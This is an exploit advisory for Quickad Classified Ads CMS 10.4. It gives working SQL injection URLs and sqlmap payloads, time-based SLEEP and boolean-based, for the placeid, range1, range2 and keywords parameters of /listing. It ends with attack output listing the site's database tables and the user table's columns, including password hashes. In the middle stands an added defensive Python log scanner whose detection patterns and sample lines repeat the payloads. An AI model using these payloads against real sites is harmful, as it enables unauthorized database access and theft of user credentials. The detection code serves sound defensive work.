Authored by CraCkEr

Quickad Classified Ads CMS version 10.4 suffers from a remote SQL injection vulnerability.

[ Vulnerability ]

Author    : CraCkEr
Website   : https://bylancer.com/
Vendor    : Bylancer
Software  : Quickad Classified Ads CMS 10.4
Vuln Type : SQL Injection
Impact    : Database Access

Release Notes:

SQL injection attacks can allow unauthorized access to sensitive data and modification of
data, and can crash the application or make it unavailable, leading to lost revenue and
damage to a company's reputation.

Greets:

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09

CryptoJob (Twitter) twitter.com/0x0CryptoJob

© CraCkEr 2023

Path: /listing

https://website/listing?location=Beirut&latitude=&longitude=&placetype=city&placeid=[SQLI]&keywords=[SQLI]&cat=&subcat=
https://website/listing?keywords=[SQLI]&location=Beirut&placetype=city&placeid=[SQLI]&cat=1&subcat=&filter=&sort=Newest&order=DESC&custom%5B15%5D=&range1=[SQLI]&range2=[SQLI]


GET parameter 'range1' is vulnerable to SQL Injection

---
Parameter: range1 (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: keywords=&location=Beirut&placetype=city&placeid=276781&cat=&subcat=&filter=&sort=Newest&order=DESC&range1=1 AND (SELECT 3133 FROM (SELECT(SLEEP(5)))crfu)&range2=1
---

GET parameter 'range2' is vulnerable to SQL Injection

---
Parameter: range2 (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: keywords=&location=Beirut&placetype=city&placeid=276781&cat=&subcat=&filter=&sort=Newest&order=DESC&range1=1&range2=1) AND (SELECT 7411 FROM (SELECT(SLEEP(5)))iiGu)-- jHQy
---

GET parameter 'placeid' is vulnerable to SQL Injection

---
Parameter: placeid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: location=Beirut&latitude=&longitude=&placetype=city&placeid=276781') AND 3510=3510 AND ('DiTr'='DiTr&keywords=&cat=&subcat=

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: location=Beirut&latitude=&longitude=&placetype=city&placeid=276781') AND (SELECT 2494 FROM (SELECT(SLEEP(5)))FKvp) AND ('WPrM'='WPrM&keywords=&cat=&subcat=
---

GET parameter 'keywords' is vulnerable to SQL Injection

---
Parameter: keywords (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: location=Beirut&latitude=1&longitude=1&placetype=city&placeid=276781&keywords=1'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z&cat=1&subcat=1
---
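
Added example (not part of the original advisory): a Python check a defender could run over web-server access logs to flag /listing requests whose placeid, range1, range2 or keywords values resemble the payloads reported above. It assumes combined-log-format lines and that the three numeric parameters carry plain numbers in legitimate traffic; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: these three parameters carry plain numbers in legitimate traffic
# (the advisory's own requests use placeid=276781, range1=1, range2=1).
NUMERIC_PARAMS = ("placeid", "range1", "range2")
NUMERIC_OK = re.compile(r"\d+(?:\.\d+)?")
# Free-text parameter: flag a quote followed by a boolean operator, or SQL function-call syntax.
KEYWORD_BAD = re.compile(r"'\s*(?:x?or|and)\b|\b(?:sleep|benchmark|select)\s*\(", re.I)
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def suspicious_params(log_line):
    """Return the sorted names of /listing parameters whose values look injected."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if url.path.rstrip("/") != "/listing":
        return []
    hits = set()
    for name, values in parse_qs(url.query).items():  # percent-decodes, skips blank values
        for value in values:
            if name in NUMERIC_PARAMS and not NUMERIC_OK.fullmatch(value.strip()):
                hits.add(name)
            elif name == "keywords" and KEYWORD_BAD.search(value):
                hits.add(name)
    return sorted(hits)

# Constructed access-log lines (combined log format); addresses are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2023:10:00:00 +0000] "GET /listing?keywords=bike&location=Beirut&placetype=city&placeid=276781&range1=10&range2=500 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [01/Jan/2023:10:00:05 +0000] "GET /listing?keywords=&placeid=276781&range1=1%20AND%20(SELECT%203133%20FROM%20(SELECT(SLEEP(5)))crfu)&range2=1 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [01/Jan/2023:10:00:12 +0000] "GET /listing?placeid=276781&keywords=1%27XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR%27Z&cat=1 HTTP/1.1" 200 5120',
]

def scan(lines):
    """Map 1-based line number -> flagged parameters, for lines with at least one hit."""
    return {n: hits for n, line in enumerate(lines, 1) if (hits := suspicious_params(line))}

if __name__ == "__main__":
    for n, hits in scan(SAMPLE_LOG).items():
        print(f"line {n}: suspicious value in {', '.join(hits)}")
```

The same numeric test works as server-side input validation for placeid, range1 and range2 until the queries behind /listing are parameterized.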


[+] Starting the Attack

fetching current database
current database: 'classified_******'


fetching tables

[53 tables]
+---------------------------+
| ad_custom_fields |
| ad_product |
| pro_admins |
| pro_adsense |
| pro_balance |
| pro_blog |
| pro_blog_cat_relation |
| pro_blog_categories |
| pro_blog_comment |
| pro_catagory_main |
| pro_catagory_sub |
| pro_category_translation |
| pro_cities |
| pro_countries |
| pro_currencies |
| pro_custom_data |
| pro_custom_fields |
| pro_custom_options |
| pro_emailq |
| pro_faq_entries |
| pro_favads |
| pro_firebase_device_token |
| pro_languages |
| pro_login_attempts |
| pro_logs |
| pro_messages |
| pro_mobile_numbers |
| pro_notification |
| pro_options |
| pro_pages |
| pro_payments |
| pro_plan_options |
| pro_plans |
| pro_product |
| pro_product_resubmit |
| pro_push_notification |
| pro_qbm_banners |
| pro_qbm_log |
| pro_qbm_options |
| pro_qbm_transactions |
| pro_qbm_types |
| pro_reviews |
| pro_subadmin1 |
| pro_subadmin2 |
| pro_subscriptions |
| pro_taxes |
| pro_testimonials |
| pro_time_zones |
| pro_transaction |
| pro_upgrades |
| pro_user |
| pro_user_options |
| pro_usergroups |
+---------------------------+


fetching columns from Table 'pro_user'

[36 columns]
+----------------+----------------------------------------+
| Column | Type |
+----------------+----------------------------------------+
| description | text |
| name | varchar(225) |
| status | enum('0','1','2') |
| view | int(11) |
| address | varchar(255) |
| city | varchar(225) |
| confirm | varchar(255) |
| country | varchar(50) |
| created_at | datetime |
| email | varchar(255) |
| facebook | varchar(255) |
| forgot | varchar(255) |
| googleplus | varchar(255) |
| group_id | int(11) |
| id | int(11) |
| image | varchar(225) |
| instagram | varchar(255) |
| lastactive | datetime |
| linkedin | varchar(255) |
| notify | enum('0','1') |
| notify_cat | varchar(255) |
| oauth_link | varchar(255) |
| oauth_provider | enum('','facebook','google','twitter') |
| oauth_uid | varchar(100) |
| online | enum('0','1') |
| password_hash | varchar(255) |
| phone | varchar(255) |
| postcode | varchar(255) |
| sex | enum('Male','Female','Other') |
| tagline | varchar(255) |
| twitter | varchar(255) |
| updated_at | datetime |
| user_type | enum('user','seller') |
| username | varchar(255) |
| website | varchar(255) |
| youtube | varchar(255) |
+----------------+----------------------------------------+


[-] Done